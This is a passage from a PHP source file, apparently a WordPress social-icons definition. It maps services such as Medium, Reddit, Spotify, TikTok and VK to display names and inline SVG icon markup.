.22a.71651.71651,0,0,0-1.433.0093.71656.71656,0,0,0,1.433-.0093ZM5.37528,6.17908A.63823.63823,0,1,0,6.015,5.54483.62292.62292,0,0,0,5.37528,6.17908Zm6.68214,14.80843a.54949.54949,0,1,0-.55052.541A.54556.54556,0,0,0,12.05742,20.98752Zm8.53235-8.49689a.54777.54777,0,0,0-.54027.54023.53327.53327,0,0,0,.532.52293.51548.51548,0,0,0,.53272-.5237A.53187.53187,0,0,0,20.58977,12.49063ZM7.82846,2.4715a.44927.44927,0,1,0,.44484.44766A.43821.43821,0,0,0,7.82846,2.4715Zm13.775,7.60492a.41186.41186,0,0,0-.40065.39623.40178.40178,0,0,0,.40168.40168A.38994.38994,0,0,0,22,10.48172.39946.39946,0,0,0,21.60349,10.07642ZM5.79193,17.96207a.40469.40469,0,0,0-.397-.39646.399.399,0,0,0-.396.405.39234.39234,0,0,0,.39939.389A.39857.39857,0,0,0,5.79193,17.96207Z"></path></svg>',
		),
		'medium'        => array(
			'name' => 'Medium',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M13.2,12c0,3-2.4,5.4-5.3,5.4S2.6,15,2.6,12s2.4-5.4,5.3-5.4S13.2,9,13.2,12 M19.1,12c0,2.8-1.2,5-2.7,5s-2.7-2.3-2.7-5s1.2-5,2.7-5C17.9,7,19.1,9.2,19.1,12 M21.4,12c0,2.5-0.4,4.5-0.9,4.5c-0.5,0-0.9-2-0.9-4.5s0.4-4.5,0.9-4.5C21,7.5,21.4,9.5,21.4,12"></path></svg>',
		),
		'patreon'       => array(
			'name' => 'Patreon',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M20 8.40755C19.9969 6.10922 18.2543 4.22555 16.2097 3.54588C13.6708 2.70188 10.3222 2.82421 7.89775 3.99921C4.95932 5.42355 4.03626 8.54355 4.00186 11.6552C3.97363 14.2136 4.2222 20.9517 7.92225 20.9997C10.6715 21.0356 11.0809 17.3967 12.3529 15.6442C13.258 14.3974 14.4233 14.0452 15.8578 13.6806C18.3233 13.0537 20.0036 11.0551 20 8.40755Z" /></svg>',
		),
		'pinterest'     => array(
			'name' => 'Pinterest',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M12.289,2C6.617,2,3.606,5.648,3.606,9.622c0,1.846,1.025,4.146,2.666,4.878c0.25,0.111,0.381,0.063,0.439-0.169 c0.044-0.175,0.267-1.029,0.365-1.428c0.032-0.128,0.017-0.237-0.091-0.362C6.445,11.911,6.01,10.75,6.01,9.668 c0-2.777,2.194-5.464,5.933-5.464c3.23,0,5.49,2.108,5.49,5.122c0,3.407-1.794,5.768-4.13,5.768c-1.291,0-2.257-1.021-1.948-2.277 c0.372-1.495,1.089-3.112,1.089-4.191c0-0.967-0.542-1.775-1.663-1.775c-1.319,0-2.379,1.309-2.379,3.059 c0,1.115,0.394,1.869,0.394,1.869s-1.302,5.279-1.54,6.261c-0.405,1.666,0.053,4.368,0.094,4.604 c0.021,0.126,0.167,0.169,0.25,0.063c0.129-0.165,1.699-2.419,2.142-4.051c0.158-0.59,0.817-2.995,0.817-2.995 c0.43,0.784,1.681,1.446,3.013,1.446c3.963,0,6.822-3.494,6.822-7.833C20.394,5.112,16.849,2,12.289,2"></path></svg>',
		),
		'pocket'        => array(
			'name' => 'Pocket',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M21.927,4.194C21.667,3.48,20.982,3,20.222,3h-0.01h-1.721H3.839C3.092,3,2.411,3.47,2.145,4.17 C2.066,4.378,2.026,4.594,2.026,4.814v6.035l0.069,1.2c0.29,2.73,1.707,5.115,3.899,6.778c0.039,0.03,0.079,0.059,0.119,0.089 l0.025,0.018c1.175,0.859,2.491,1.441,3.91,1.727c0.655,0.132,1.325,0.2,1.991,0.2c0.615,0,1.232-0.057,1.839-0.17 c0.073-0.014,0.145-0.028,0.219-0.044c0.02-0.004,0.042-0.012,0.064-0.023c1.359-0.297,2.621-0.864,3.753-1.691l0.025-0.018 c0.04-0.029,0.08-0.058,0.119-0.089c2.192-1.664,3.609-4.049,3.898-6.778l0.069-1.2V4.814C22.026,4.605,22,4.398,21.927,4.194z M17.692,10.481l-4.704,4.512c-0.266,0.254-0.608,0.382-0.949,0.382c-0.342,0-0.684-0.128-0.949-0.382l-4.705-4.512 C5.838,9.957,5.82,9.089,6.344,8.542c0.524-0.547,1.392-0.565,1.939-0.04l3.756,3.601l3.755-3.601 c0.547-0.524,1.415-0.506,1.939,0.04C18.256,9.089,18.238,9.956,17.692,10.481z"></path></svg>',
		),
		'reddit'        => array(
			'name' => 'Reddit',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M5.27 9.221A2.775 2.775 0 0 0 2.498 11.993a2.785 2.785 0 0 0 1.6 2.511 5.337 5.337 0 0 0 2.374 4.11 9.386 9.386 0 0 0 5.539 1.7 9.386 9.386 0 0 0 5.541-1.7 5.331 5.331 0 0 0 2.372-4.114 2.787 2.787 0 0 0 1.583-2.5 2.775 2.775 0 0 0-2.772-2.772 2.742 2.742 0 0 0-1.688.574 9.482 9.482 0 0 0-4.637-1.348v-.008a2.349 2.349 0 0 1 2.011-2.316 1.97 1.97 0 0 0 1.926 1.521 1.98 1.98 0 0 0 1.978-1.978 1.98 1.98 0 0 0-1.978-1.978 1.985 1.985 0 0 0-1.938 1.578 3.183 3.183 0 0 0-2.849 3.172v.011a9.463 9.463 0 0 0-4.59 1.35 2.741 2.741 0 0 0-1.688-.574Zm6.736 9.1a3.162 3.162 0 0 1-2.921-1.944.215.215 0 0 1 .014-.2.219.219 0 0 1 .168-.106 27.327 27.327 0 0 1 2.74-.133 27.357 27.357 0 0 1 2.74.133.219.219 0 0 1 .168.106.215.215 0 0 1 .014.2 3.158 3.158 0 0 1-2.921 1.944Zm3.743-3.157a1.265 1.265 0 0 1-1.4-1.371 1.954 1.954 0 0 1 .482-1.442 1.15 1.15 0 0 1 .842-.379 1.7 1.7 0 0 1 1.49 1.777 1.323 1.323 0 0 1-.325 1.015 1.476 1.476 0 0 1-1.089.4Zm-7.485 0a1.476 1.476 0 0 1-1.086-.4 1.323 1.323 0 0 1-.325-1.016 1.7 1.7 0 0 1 1.49-1.777 1.151 1.151 0 0 1 .843.379 1.951 1.951 0 0 1 .481 1.441 1.276 1.276 0 0 1-1.403 1.373Z"></path></svg>',
		),
		'share'         => array(
			'name' => 'Share Icon',
			'icon' => '<svg width="24" height="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9 11.8l6.1-4.5c.1.4.4.7.9.7h2c.6 0 1-.4 1-1V5c0-.6-.4-1-1-1h-2c-.6 0-1 .4-1 1v.4l-6.4 4.8c-.2-.1-.4-.2-.6-.2H6c-.6 0-1 .4-1 1v2c0 .6.4 1 1 1h2c.2 0 .4-.1.6-.2l6.4 4.8v.4c0 .6.4 1 1 1h2c.6 0 1-.4 1-1v-2c0-.6-.4-1-1-1h-2c-.5 0-.8.3-.9.7L9 12.2v-.4z"/></svg>',
		),
		'skype'         => array(
			'name' => 'Skype',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M10.113,2.699c0.033-0.006,0.067-0.013,0.1-0.02c0.033,0.017,0.066,0.033,0.098,0.051L10.113,2.699z M2.72,10.223 c-0.006,0.034-0.011,0.069-0.017,0.103c0.018,0.032,0.033,0.064,0.051,0.095L2.72,10.223z M21.275,13.771 c0.007-0.035,0.011-0.071,0.018-0.106c-0.018-0.031-0.033-0.064-0.052-0.095L21.275,13.771z M13.563,21.199 c0.032,0.019,0.065,0.035,0.096,0.053c0.036-0.006,0.071-0.011,0.105-0.017L13.563,21.199z M22,16.386 c0,1.494-0.581,2.898-1.637,3.953c-1.056,1.057-2.459,1.637-3.953,1.637c-0.967,0-1.914-0.251-2.75-0.725 c0.036-0.006,0.071-0.011,0.105-0.017l-0.202-0.035c0.032,0.019,0.065,0.035,0.096,0.053c-0.543,0.096-1.099,0.147-1.654,0.147 c-1.275,0-2.512-0.25-3.676-0.743c-1.125-0.474-2.135-1.156-3.002-2.023c-0.867-0.867-1.548-1.877-2.023-3.002 c-0.493-1.164-0.743-2.401-0.743-3.676c0-0.546,0.049-1.093,0.142-1.628c0.018,0.032,0.033,0.064,0.051,0.095L2.72,10.223 c-0.006,0.034-0.011,0.069-0.017,0.103C2.244,9.5,2,8.566,2,7.615c0-1.493,0.582-2.898,1.637-3.953 c1.056-1.056,2.46-1.638,3.953-1.638c0.915,0,1.818,0.228,2.622,0.655c-0.033,0.007-0.067,0.013-0.1,0.02l0.199,0.031 c-0.032-0.018-0.066-0.034-0.098-0.051c0.002,0,0.003-0.001,0.004-0.001c0.586-0.112,1.187-0.169,1.788-0.169 c1.275,0,2.512,0.249,3.676,0.742c1.124,0.476,2.135,1.156,3.002,2.024c0.868,0.867,1.548,1.877,2.024,3.002 c0.493,1.164,0.743,2.401,0.743,3.676c0,0.575-0.054,1.15-0.157,1.712c-0.018-0.031-0.033-0.064-0.052-0.095l0.034,0.201 c0.007-0.035,0.011-0.071,0.018-0.106C21.754,14.494,22,15.432,22,16.386z M16.817,14.138c0-1.331-0.613-2.743-3.033-3.282 l-2.209-0.49c-0.84-0.192-1.807-0.444-1.807-1.237c0-0.794,0.679-1.348,1.903-1.348c2.468,0,2.243,1.696,3.468,1.696 c0.645,0,1.209-0.379,1.209-1.031c0-1.521-2.435-2.663-4.5-2.663c-2.242,0-4.63,0.952-4.63,3.488c0,1.221,0.436,2.521,2.839,3.123 l2.984,0.745c0.903,0.223,1.129,0.731,1.129,1.189c0,0.762-0.758,1.507-2.129,1.507c-2.679,0-2.307-2.062-3.743-2.062 c-0.645,0-1.113,0.444-1.113,1.078c0,1.236,1.501,2.886,4.856,2.886C15.236,17.737,16.817,16.199,16.817,14.138z"></path></svg>',
		),
		'snapchat'      => array(
			'name' => 'Snapchat',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M12.065,2a5.526,5.526,0,0,1,3.132.892A5.854,5.854,0,0,1,17.326,5.4a5.821,5.821,0,0,1,.351,2.33q0,.612-.117,2.487a.809.809,0,0,0,.365.091,1.93,1.93,0,0,0,.664-.176,1.93,1.93,0,0,1,.664-.176,1.3,1.3,0,0,1,.729.234.7.7,0,0,1,.351.6.839.839,0,0,1-.41.7,2.732,2.732,0,0,1-.9.41,3.192,3.192,0,0,0-.9.378.728.728,0,0,0-.41.618,1.575,1.575,0,0,0,.156.56,6.9,6.9,0,0,0,1.334,1.953,5.6,5.6,0,0,0,1.881,1.315,5.875,5.875,0,0,0,1.042.3.42.42,0,0,1,.365.456q0,.911-2.852,1.341a1.379,1.379,0,0,0-.143.507,1.8,1.8,0,0,1-.182.605.451.451,0,0,1-.429.241,5.878,5.878,0,0,1-.807-.085,5.917,5.917,0,0,0-.833-.085,4.217,4.217,0,0,0-.807.065,2.42,2.42,0,0,0-.82.293,6.682,6.682,0,0,0-.755.5q-.351.267-.755.527a3.886,3.886,0,0,1-.989.436A4.471,4.471,0,0,1,11.831,22a4.307,4.307,0,0,1-1.256-.176,3.784,3.784,0,0,1-.976-.436q-.4-.26-.749-.527a6.682,6.682,0,0,0-.755-.5,2.422,2.422,0,0,0-.807-.293,4.432,4.432,0,0,0-.82-.065,5.089,5.089,0,0,0-.853.1,5,5,0,0,1-.762.1.474.474,0,0,1-.456-.241,1.819,1.819,0,0,1-.182-.618,1.411,1.411,0,0,0-.143-.521q-2.852-.429-2.852-1.341a.42.42,0,0,1,.365-.456,5.793,5.793,0,0,0,1.042-.3,5.524,5.524,0,0,0,1.881-1.315,6.789,6.789,0,0,0,1.334-1.953A1.575,1.575,0,0,0,6,12.9a.728.728,0,0,0-.41-.618,3.323,3.323,0,0,0-.9-.384,2.912,2.912,0,0,1-.9-.41.814.814,0,0,1-.41-.684.71.71,0,0,1,.338-.593,1.208,1.208,0,0,1,.716-.241,1.976,1.976,0,0,1,.625.169,2.008,2.008,0,0,0,.69.169.919.919,0,0,0,.416-.091q-.117-1.849-.117-2.474A5.861,5.861,0,0,1,6.385,5.4,5.516,5.516,0,0,1,8.625,2.819,7.075,7.075,0,0,1,12.062,2Z"></path></svg>',
		),
		'soundcloud'    => array(
			'name' => 'Soundcloud',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M8.9,16.1L9,14L8.9,9.5c0-0.1,0-0.1-0.1-0.1c0,0-0.1-0.1-0.1-0.1c-0.1,0-0.1,0-0.1,0.1c0,0-0.1,0.1-0.1,0.1L8.3,14l0.1,2.1 c0,0.1,0,0.1,0.1,0.1c0,0,0.1,0.1,0.1,0.1C8.8,16.3,8.9,16.3,8.9,16.1z M11.4,15.9l0.1-1.8L11.4,9c0-0.1,0-0.2-0.1-0.2 c0,0-0.1,0-0.1,0s-0.1,0-0.1,0c-0.1,0-0.1,0.1-0.1,0.2l0,0.1l-0.1,5c0,0,0,0.7,0.1,2v0c0,0.1,0,0.1,0.1,0.1c0.1,0.1,0.1,0.1,0.2,0.1 c0.1,0,0.1,0,0.2-0.1c0.1,0,0.1-0.1,0.1-0.2L11.4,15.9z M2.4,12.9L2.5,14l-0.2,1.1c0,0.1,0,0.1-0.1,0.1c0,0-0.1,0-0.1-0.1L2.1,14 l0.1-1.1C2.2,12.9,2.3,12.9,2.4,12.9C2.3,12.9,2.4,12.9,2.4,12.9z M3.1,12.2L3.3,14l-0.2,1.8c0,0.1,0,0.1-0.1,0.1 c-0.1,0-0.1,0-0.1-0.1L2.8,14L3,12.2C3,12.2,3,12.2,3.1,12.2C3.1,12.2,3.1,12.2,3.1,12.2z M3.9,11.9L4.1,14l-0.2,2.1 c0,0.1,0,0.1-0.1,0.1c-0.1,0-0.1,0-0.1-0.1L3.5,14l0.2-2.1c0-0.1,0-0.1,0.1-0.1C3.9,11.8,3.9,11.8,3.9,11.9z M4.7,11.9L4.9,14 l-0.2,2.1c0,0.1-0.1,0.1-0.1,0.1c-0.1,0-0.1,0-0.1-0.1L4.3,14l0.2-2.2c0-0.1,0-0.1,0.1-0.1C4.7,11.7,4.7,11.8,4.7,11.9z M5.6,12 l0.2,2l-0.2,2.1c0,0.1-0.1,0.1-0.1,0.1c0,0-0.1,0-0.1,0c0,0,0-0.1,0-0.1L5.1,14l0.2-2c0,0,0-0.1,0-0.1s0.1,0,0.1,0 C5.5,11.9,5.5,11.9,5.6,12L5.6,12z M6.4,10.7L6.6,14l-0.2,2.1c0,0,0,0.1,0,0.1c0,0-0.1,0-0.1,0c-0.1,0-0.1-0.1-0.2-0.2L5.9,14 l0.2-3.3c0-0.1,0.1-0.2,0.2-0.2c0,0,0.1,0,0.1,0C6.4,10.7,6.4,10.7,6.4,10.7z M7.2,10l0.2,4.1l-0.2,2.1c0,0,0,0.1,0,0.1 c0,0-0.1,0-0.1,0c-0.1,0-0.2-0.1-0.2-0.2l-0.1-2.1L6.8,10c0-0.1,0.1-0.2,0.2-0.2c0,0,0.1,0,0.1,0S7.2,9.9,7.2,10z M8,9.6L8.2,14 L8,16.1c0,0.1-0.1,0.2-0.2,0.2c-0.1,0-0.2-0.1-0.2-0.2L7.5,14l0.1-4.4c0-0.1,0-0.1,0.1-0.1c0,0,0.1-0.1,0.1-0.1c0.1,0,0.1,0,0.1,0.1 C8,9.6,8,9.6,8,9.6z M11.4,16.1L11.4,16.1L11.4,16.1z M9.7,9.6L9.8,14l-0.1,2.1c0,0.1,0,0.1-0.1,0.2s-0.1,0.1-0.2,0.1 c-0.1,0-0.1,0-0.1-0.1s-0.1-0.1-0.1-0.2L9.2,14l0.1-4.4c0-0.1,0-0.1,0.1-0.2s0.1-0.1,0.2-0.1c0.1,0,0.1,0,0.2,0.1S9.7,9.5,9.7,9.6 L9.7,9.6z M10.6,9.8l0.1,4.3l-0.1,2c0,0.1,0,0.1-0.1,0.2c0,0-0.1,0.1-0.2,0.1c-0.1,0-0.1,0-0.2-0.1c0,0-0.1-0.1-0.1-0.2L10,14 l0.1-4.3c0-0.1,0-0.1,0.1-0.2c0,0,0.1-0.1,0.2-0.1c0.1,0,0.1,0,0.2,0.1S10.6,9.7,10.6,9.8z M12.4,14l-0.1,2c0,0.1,0,0.1-0.1,0.2 c-0.1,0.1-0.1,0.1-0.2,0.1c-0.1,0-0.1,0-0.2-0.1c-0.1-0.1-0.1-0.1-0.1-0.2l-0.1-1l-0.1-1l0.1-5.5v0c0-0.1,0-0.2,0.1-0.2 c0.1,0,0.1-0.1,0.2-0.1c0,0,0.1,0,0.1,0c0.1,0,0.1,0.1,0.1,0.2L12.4,14z M22.1,13.9c0,0.7-0.2,1.3-0.7,1.7c-0.5,0.5-1.1,0.7-1.7,0.7 h-6.8c-0.1,0-0.1,0-0.2-0.1c-0.1-0.1-0.1-0.1-0.1-0.2V8.2c0-0.1,0.1-0.2,0.2-0.3c0.5-0.2,1-0.3,1.6-0.3c1.1,0,2.1,0.4,2.9,1.1 c0.8,0.8,1.3,1.7,1.4,2.8c0.3-0.1,0.6-0.2,1-0.2c0.7,0,1.3,0.2,1.7,0.7C21.8,12.6,22.1,13.2,22.1,13.9L22.1,13.9z"></path></svg>',
		),
		'spotify'       => array(
			'name' => 'Spotify',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M12,2C6.477,2,2,6.477,2,12c0,5.523,4.477,10,10,10c5.523,0,10-4.477,10-10C22,6.477,17.523,2,12,2 M16.586,16.424 c-0.18,0.295-0.563,0.387-0.857,0.207c-2.348-1.435-5.304-1.76-8.785-0.964c-0.335,0.077-0.67-0.133-0.746-0.469 c-0.077-0.335,0.132-0.67,0.469-0.746c3.809-0.871,7.077-0.496,9.713,1.115C16.673,15.746,16.766,16.13,16.586,16.424 M17.81,13.7 c-0.226,0.367-0.706,0.482-1.072,0.257c-2.687-1.652-6.785-2.131-9.965-1.166C6.36,12.917,5.925,12.684,5.8,12.273 C5.675,11.86,5.908,11.425,6.32,11.3c3.632-1.102,8.147-0.568,11.234,1.328C17.92,12.854,18.035,13.335,17.81,13.7 M17.915,10.865 c-3.223-1.914-8.54-2.09-11.618-1.156C5.804,9.859,5.281,9.58,5.131,9.086C4.982,8.591,5.26,8.069,5.755,7.919 c3.532-1.072,9.404-0.865,13.115,1.338c0.445,0.264,0.59,0.838,0.327,1.282C18.933,10.983,18.359,11.129,17.915,10.865"></path></svg>',
		),
		'telegram'      => array(
			'name' => 'Telegram',
			'icon' => '<svg width="24" height="24" viewBox="0 0 128 128" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M28.9700376,63.3244248 C47.6273373,55.1957357 60.0684594,49.8368063 66.2934036,47.2476366 C84.0668845,39.855031 87.7600616,38.5708563 90.1672227,38.528 C90.6966555,38.5191258 91.8804274,38.6503351 92.6472251,39.2725385 C93.294694,39.7979149 93.4728387,40.5076237 93.5580865,41.0057381 C93.6433345,41.5038525 93.7494885,42.63857 93.6651041,43.5252052 C92.7019529,53.6451182 88.5344133,78.2034783 86.4142057,89.5379542 C85.5170662,94.3339958 83.750571,95.9420841 82.0403991,96.0994568 C78.3237996,96.4414641 75.5015827,93.6432685 71.9018743,91.2836143 C66.2690414,87.5912212 63.0868492,85.2926952 57.6192095,81.6896017 C51.3004058,77.5256038 55.3966232,75.2369981 58.9976911,71.4967761 C59.9401076,70.5179421 76.3155302,55.6232293 76.6324771,54.2720454 C76.6721165,54.1030573 76.7089039,53.4731496 76.3346867,53.1405352 C75.9604695,52.8079208 75.4081573,52.921662 75.0095933,53.0121213 C74.444641,53.1403447 65.4461175,59.0880351 48.0140228,70.8551922 C45.4598218,72.6091037 43.1463059,73.4636682 41.0734751,73.4188859 C38.7883453,73.3695169 34.3926725,72.1268388 31.1249416,71.0646282 C27.1169366,69.7617838 23.931454,69.0729605 24.208838,66.8603276 C24.3533167,65.7078514 25.9403832,64.5292172 28.9700376,63.3244248 Z" /></svg>',
		),
		'threads'       => array(
			'name' => 'Threads',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M16.3 11.3c-.1 0-.2-.1-.2-.1-.1-2.6-1.5-4-3.9-4-1.4 0-2.6.6-3.3 1.7l1.3.9c.5-.8 1.4-1 2-1 .8 0 1.4.2 1.7.7.3.3.5.8.5 1.3-.7-.1-1.4-.2-2.2-.1-2.2.1-3.7 1.4-3.6 3.2 0 .9.5 1.7 1.3 2.2.7.4 1.5.6 2.4.6 1.2-.1 2.1-.5 2.7-1.3.5-.6.8-1.4.9-2.4.6.3 1 .8 1.2 1.3.4.9.4 2.4-.8 3.6-1.1 1.1-2.3 1.5-4.3 1.5-2.1 0-3.8-.7-4.8-2S5.7 14.3 5.7 12c0-2.3.5-4.1 1.5-5.4 1.1-1.3 2.7-2 4.8-2 2.2 0 3.8.7 4.9 2 .5.7.9 1.5 1.2 2.5l1.5-.4c-.3-1.2-.8-2.2-1.5-3.1-1.3-1.7-3.3-2.6-6-2.6-2.6 0-4.7.9-6 2.6C4.9 7.2 4.3 9.3 4.3 12s.6 4.8 1.9 6.4c1.4 1.7 3.4 2.6 6 2.6 2.3 0 4-.6 5.3-2 1.8-1.8 1.7-4 1.1-5.4-.4-.9-1.2-1.7-2.3-2.3zm-4 3.8c-1 .1-2-.4-2-1.3 0-.7.5-1.5 2.1-1.6h.5c.6 0 1.1.1 1.6.2-.2 2.3-1.3 2.7-2.2 2.7z"/></svg>',
		),
		'tiktok'        => array(
			'name' => 'TikTok',
			'icon' => '<svg width="24" height="24" viewBox="0 0 32 32" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M16.708 0.027c1.745-0.027 3.48-0.011 5.213-0.027 0.105 2.041 0.839 4.12 2.333 5.563 1.491 1.479 3.6 2.156 5.652 2.385v5.369c-1.923-0.063-3.855-0.463-5.6-1.291-0.76-0.344-1.468-0.787-2.161-1.24-0.009 3.896 0.016 7.787-0.025 11.667-0.104 1.864-0.719 3.719-1.803 5.255-1.744 2.557-4.771 4.224-7.88 4.276-1.907 0.109-3.812-0.411-5.437-1.369-2.693-1.588-4.588-4.495-4.864-7.615-0.032-0.667-0.043-1.333-0.016-1.984 0.24-2.537 1.495-4.964 3.443-6.615 2.208-1.923 5.301-2.839 8.197-2.297 0.027 1.975-0.052 3.948-0.052 5.923-1.323-0.428-2.869-0.308-4.025 0.495-0.844 0.547-1.485 1.385-1.819 2.333-0.276 0.676-0.197 1.427-0.181 2.145 0.317 2.188 2.421 4.027 4.667 3.828 1.489-0.016 2.916-0.88 3.692-2.145 0.251-0.443 0.532-0.896 0.547-1.417 0.131-2.385 0.079-4.76 0.095-7.145 0.011-5.375-0.016-10.735 0.025-16.093z" /></svg>',
		),
		'tumblr'        => array(
			'name' => 'Tumblr',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M17.04 21.28h-3.28c-2.84 0-4.94-1.37-4.94-5.02v-5.67H6.08V7.5c2.93-.73 4.11-3.3 4.3-5.48h3.01v4.93h3.47v3.65H13.4v4.93c0 1.47.73 2.01 1.92 2.01h1.73v3.75z" /></path></svg>',
		),
		'twitch'        => array(
			'name' => 'Twitch',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M16.499,8.089h-1.636v4.91h1.636V8.089z M12,8.089h-1.637v4.91H12V8.089z M4.228,3.178L3,6.451v13.092h4.499V22h2.456 l2.454-2.456h3.681L21,14.636V3.178H4.228z M19.364,13.816l-2.864,2.865H12l-2.453,2.453V16.68H5.863V4.814h13.501V13.816z"></path></svg>',
		),
		'twitter'       => array(
			'name' => 'Twitter',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M22.23,5.924c-0.736,0.326-1.527,0.547-2.357,0.646c0.847-0.508,1.498-1.312,1.804-2.27 c-0.793,0.47-1.671,0.812-2.606,0.996C18.324,4.498,17.257,4,16.077,4c-2.266,0-4.103,1.837-4.103,4.103 c0,0.322,0.036,0.635,0.106,0.935C8.67,8.867,5.647,7.234,3.623,4.751C3.27,5.357,3.067,6.062,3.067,6.814 c0,1.424,0.724,2.679,1.825,3.415c-0.673-0.021-1.305-0.206-1.859-0.513c0,0.017,0,0.034,0,0.052c0,1.988,1.414,3.647,3.292,4.023 c-0.344,0.094-0.707,0.144-1.081,0.144c-0.264,0-0.521-0.026-0.772-0.074c0.522,1.63,2.038,2.816,3.833,2.85 c-1.404,1.1-3.174,1.756-5.096,1.756c-0.331,0-0.658-0.019-0.979-0.057c1.816,1.164,3.973,1.843,6.29,1.843 c7.547,0,11.675-6.252,11.675-11.675c0-0.178-0.004-0.355-0.012-0.531C20.985,7.47,21.68,6.747,22.23,5.924z"></path></svg>',
		),
		'vimeo'         => array(
			'name' => 'Vimeo',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M22.396,7.164c-0.093,2.026-1.507,4.799-4.245,8.32C15.322,19.161,12.928,21,10.97,21c-1.214,0-2.24-1.119-3.079-3.359 c-0.56-2.053-1.119-4.106-1.68-6.159C5.588,9.243,4.921,8.122,4.206,8.122c-0.156,0-0.701,0.328-1.634,0.98L1.594,7.841 c1.027-0.902,2.04-1.805,3.037-2.708C6.001,3.95,7.03,3.327,7.715,3.264c1.619-0.156,2.616,0.951,2.99,3.321 c0.404,2.557,0.685,4.147,0.841,4.769c0.467,2.121,0.981,3.181,1.542,3.181c0.435,0,1.09-0.688,1.963-2.065 c0.871-1.376,1.338-2.422,1.401-3.142c0.125-1.187-0.343-1.782-1.401-1.782c-0.498,0-1.012,0.115-1.541,0.341 c1.023-3.35,2.977-4.977,5.862-4.884C21.511,3.066,22.52,4.453,22.396,7.164z"></path></svg>',
		),
		'vk'            => array(
			'name' => 'VK',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M22,7.1c0.2,0.4-0.4,1.5-1.6,3.1c-0.2,0.2-0.4,0.5-0.7,0.9c-0.5,0.7-0.9,1.1-0.9,1.4c-0.1,0.3-0.1,0.6,0.1,0.8 c0.1,0.1,0.4,0.4,0.8,0.9h0l0,0c1,0.9,1.6,1.7,2,2.3c0,0,0,0.1,0.1,0.1c0,0.1,0,0.1,0.1,0.3c0,0.1,0,0.2,0,0.4 c0,0.1-0.1,0.2-0.3,0.3c-0.1,0.1-0.4,0.1-0.6,0.1l-2.7,0c-0.2,0-0.4,0-0.6-0.1c-0.2-0.1-0.4-0.1-0.5-0.2l-0.2-0.1 c-0.2-0.1-0.5-0.4-0.7-0.7s-0.5-0.6-0.7-0.8c-0.2-0.2-0.4-0.4-0.6-0.6C14.8,15,14.6,15,14.4,15c0,0,0,0-0.1,0c0,0-0.1,0.1-0.2,0.2 c-0.1,0.1-0.2,0.2-0.2,0.3c-0.1,0.1-0.1,0.3-0.2,0.5c-0.1,0.2-0.1,0.5-0.1,0.8c0,0.1,0,0.2,0,0.3c0,0.1-0.1,0.2-0.1,0.2l0,0.1 c-0.1,0.1-0.3,0.2-0.6,0.2h-1.2c-0.5,0-1,0-1.5-0.2c-0.5-0.1-1-0.3-1.4-0.6s-0.7-0.5-1.1-0.7s-0.6-0.4-0.7-0.6l-0.3-0.3 c-0.1-0.1-0.2-0.2-0.3-0.3s-0.4-0.5-0.7-0.9s-0.7-1-1.1-1.6c-0.4-0.6-0.8-1.3-1.3-2.2C2.9,9.4,2.5,8.5,2.1,7.5C2,7.4,2,7.3,2,7.2 c0-0.1,0-0.1,0-0.2l0-0.1c0.1-0.1,0.3-0.2,0.6-0.2l2.9,0c0.1,0,0.2,0,0.2,0.1S5.9,6.9,5.9,7L6,7c0.1,0.1,0.2,0.2,0.3,0.3 C6.4,7.7,6.5,8,6.7,8.4C6.9,8.8,7,9,7.1,9.2l0.2,0.3c0.2,0.4,0.4,0.8,0.6,1.1c0.2,0.3,0.4,0.5,0.5,0.7s0.3,0.3,0.4,0.4 c0.1,0.1,0.3,0.1,0.4,0.1c0.1,0,0.2,0,0.3-0.1c0,0,0,0,0.1-0.1c0,0,0.1-0.1,0.1-0.2c0.1-0.1,0.1-0.3,0.1-0.5c0-0.2,0.1-0.5,0.1-0.8 c0-0.4,0-0.8,0-1.3c0-0.3,0-0.5-0.1-0.8c0-0.2-0.1-0.4-0.1-0.5L9.6,7.6C9.4,7.3,9.1,7.2,8.7,7.1C8.6,7.1,8.6,7,8.7,6.9 C8.9,6.7,9,6.6,9.1,6.5c0.4-0.2,1.2-0.3,2.5-0.3c0.6,0,1,0.1,1.4,0.1c0.1,0,0.3,0.1,0.3,0.1c0.1,0.1,0.2,0.1,0.2,0.3 